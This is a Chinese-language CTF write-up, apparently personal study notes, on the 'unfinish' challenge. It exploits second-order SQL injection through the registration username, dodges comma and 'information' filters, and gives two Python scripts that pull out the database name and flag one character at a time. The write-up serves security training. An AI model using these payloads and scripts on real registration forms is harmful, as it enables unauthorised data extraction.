[学习笔记]攻防世界-unfinish

解题流程

打开场景

尝试输入，提示密码错误，我们先用 dirsearch 工具扫一下网站吧

我们发现，除了login登陆页面，还有register注册页面，访问看看

题目描述是SQL，有注册，应该是二次注入，注册的时候插入语句，登陆的时候执行语句，我们抓包试试

我尝试了一些语句，最后这个命令得到了注入

我尝试了联合注入，行不通，应该是过滤了，尝试了几次，比如用 group_concat(1,database());#

提示nnnooo!!!，都被过滤了，后来看其他人的WP，知道了用+运算符来截取字符ASCII码，我们尝试一下

成功了，这里试了好几次，都被过滤了，后来发现过滤的是逗号，我们用from…for…代替，看一下代码

我们尝试写脚本来获取库名吧

import requests
from bs4 import BeautifulSoup
#这个是html解析模块，没有这个模块的话，就用pip install beautifulsoup4命令下载吧
 
database = ""
for i in range(10):
    data = {"email": "00"+str(i)+"@qq.com","username": "0'+ascii(substr((select database()) from "+str(i+1)+" for 1))+'0", "password": "123"}
    requests.post("http://61.147.171.105:64136/register.php", data)
    login = {"email": "00"+str(i)+"@qq.com","password": "123"}
    rest = requests.post("http://61.147.171.105:64136/login.php", login)
    html = rest.text
    res = BeautifulSoup(html, "html.parser")
    GetName = res.find_all("span")
    name = GetName[0].text
    if int(name) == 0:
        break
    print(chr(int(name)),end="")

我们得到了库名继续查表吧，这里遇到了问题，看了其他人的WP是过滤了information，所以猜测表名就是flag

参考链接：攻防世界-web-unfinish-从0到1的解题历程writeup_ctf web unfinish-CSDN博客

import requests
from bs4 import BeautifulSoup
 
database = ""
for i in range(50):#这里换一下注册和登陆的邮箱名，因为之前的查库名的时候给注册了
    data = {"email": "aaa"+str(i)+"@qq.com","username": "0'+ascii(substr((select * from flag) from "+str(i+1)+" for 1))+'0", "password": "123"}
    requests.post("http://61.147.171.105:64136/register.php", data)
    login = {"email": "aaa"+str(i)+"@qq.com","password": "123"}
    rest = requests.post("http://61.147.171.105:64136/login.php", login)
    html = rest.text
    res = BeautifulSoup(html, "html.parser")
    GetName = res.find_all("span")
    name = GetName[0].text
    if int(name) == 0:
        break
    print(chr(int(name)),end="")

拼接flag，成功

总结

二次注入还是有点难度，主要是绕过过滤，然后找到能正常注入的语句